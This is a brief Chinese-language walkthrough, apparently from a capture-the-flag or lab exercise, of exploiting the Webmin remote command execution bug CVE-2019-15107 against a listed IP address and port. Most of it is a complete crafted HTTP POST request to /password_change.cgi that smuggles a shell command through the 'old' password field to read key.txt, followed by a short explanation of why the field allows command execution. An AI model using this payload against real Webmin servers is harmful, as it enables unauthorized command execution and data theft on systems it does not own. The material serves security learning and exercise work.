http://blog.topsec.com.cn/webmin%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88cve-2019-15107%EF%BC%89%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90/webmin一款基于Web的Linux管理模板
利用CVE-2019-15107的exp来进行渗透
登录页面:url:Login to Webmin
https://124.70.64.48:42749/
抓包
exp:
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:42749
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: redirect=1; testing=1; sid=2c97114272115f9e3e52307ff418b31d; sessiontest=1
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Length: 72
user=root2123&pam=&expired=2&old=23| cat < key.txt&new1=test2&new2=test2
修改为构造好的exphttps请求,此时访问的url目录是/password_change.cgi,进行密码的修改的页面
看回应的包中提示loginas root了,通过原始https请求中最后一行的$oid变量来进行RCE(此变量为可控变量)
查看到key.txt这个文件
